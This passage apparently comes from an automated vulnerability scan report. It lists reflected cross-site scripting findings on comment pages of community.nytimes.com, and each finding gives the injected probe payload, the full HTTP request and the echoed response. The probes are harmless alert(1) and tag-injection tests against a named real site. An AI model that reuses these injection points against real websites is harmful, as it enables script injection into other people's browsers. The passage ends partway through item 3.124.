3.109. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52017'-alert(1)-'7d721cbfae3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments52017'-alert(1)-'7d721cbfae3/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 82778
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Proposa ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments52017'-alert(1)-'7d721cbfae3'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.110. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7646f"><a>ff2a52994e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments7646f"><a>ff2a52994e8/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 82760
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Proposa ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments7646f"><a>ff2a52994e8/artsbeat.blogs.nytimes.com/yr/mo/day/proposal-recommends-charging-admission-at-the-smithsonian/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crn ...[SNIP]...
|
3.111. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a88"><a>97992b80823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com59a88"><a>97992b80823/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34566
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Proposa ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com59a88"><a>97992b80823/yr/mo/day/proposal-recommends-charging-admission-at-the-smithsonian/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5 ...[SNIP]...
|
3.112. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caa14"-alert(1)-"f0d8d5fb934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/?caa14"-alert(1)-"f0d8d5fb934=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 80401
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Proposa ...[SNIP]... tsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_143063"; var s_pagename = "2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/?caa14"-alert(1)-"f0d8d5fb934=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.113. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 742aa'-alert(1)-'d3686b770d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments742aa'-alert(1)-'d3686b770d1/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70962
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>The Wee ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments742aa'-alert(1)-'d3686b770d1'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.114. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949b9"><a>40112219a54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments949b9"><a>40112219a54/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70874
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>The Wee ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments949b9"><a>40112219a54/artsbeat.blogs.nytimes.com/yr/mo/day/the-week-in-culture-pictures-nov-12/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink ...[SNIP]...
|
3.115. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37048"><a>fe7fd4940f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com37048"><a>fe7fd4940f8/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 33545
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>The Wee ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com37048"><a>fe7fd4940f8/yr/mo/day/the-week-in-culture-pictures-nov-12/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Botto ...[SNIP]...
|
3.116. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7977"-alert(1)-"f6aef8543a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/?c7977"-alert(1)-"f6aef8543a1=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70362
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>The Wee ...[SNIP]... = "nytimesglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_143071"; var s_pagename = "2010/11/12/the-week-in-culture-pictures-nov-12/?c7977"-alert(1)-"f6aef8543a1=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.117. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef09a"><a>6c6cf61beb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsef09a"><a>6c6cf61beb1/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 114608
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>A Defic ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsef09a"><a>6c6cf61beb1/opinionator.blogs.nytimes.com/yr/mo/day/a-deficit-of-respect/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom ...[SNIP]...
|
3.118. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dd94'-alert(1)-'3641936aba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments2dd94'-alert(1)-'3641936aba3/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 114345
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>A Defic ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments2dd94'-alert(1)-'3641936aba3'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.119. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53310"><a>4fd6753484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/opinionator.blogs.nytimes.com53310"><a>4fd6753484/2010/11/12/a-deficit-of-respect/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 32847
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>A Defic ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/opinionator.blogs.nytimes.com53310"><a>4fd6753484/yr/mo/day/a-deficit-of-respect/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bottom9,Inv1,Inv2,In ...[SNIP]...
|
3.120. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66476"-alert(1)-"d2cc1166fce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/?66476"-alert(1)-"d2cc1166fce=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 104936
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>A Defic ...[SNIP]... r s_account = "nytimesglobal,nytopinionator"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "289_69231"; var s_pagename = "2010/11/12/a-deficit-of-respect/?66476"-alert(1)-"d2cc1166fce=1"; var s_channel = "opinionator"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.121. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd9c'-alert(1)-'4a279ffe4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments8cd9c'-alert(1)-'4a279ffe4c1/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 78663
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Reviewi ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments8cd9c'-alert(1)-'4a279ffe4c1'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.122. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a623d"><a>3466d5f58ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsa623d"><a>3466d5f58ee/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 78729
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Reviewi ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsa623d"><a>3466d5f58ee/wheels.blogs.nytimes.com/yr/mo/day/reviewing-the-2011-aston-martin-v-12-vantage/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,S ...[SNIP]...
|
3.123. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47de7"><a>818b9e1e4e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/wheels.blogs.nytimes.com47de7"><a>818b9e1e4e0/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 33885
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Reviewi ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/wheels.blogs.nytimes.com47de7"><a>818b9e1e4e0/yr/mo/day/reviewing-the-2011-aston-martin-v-12-vantage/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bott ...[SNIP]...
|
3.124. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
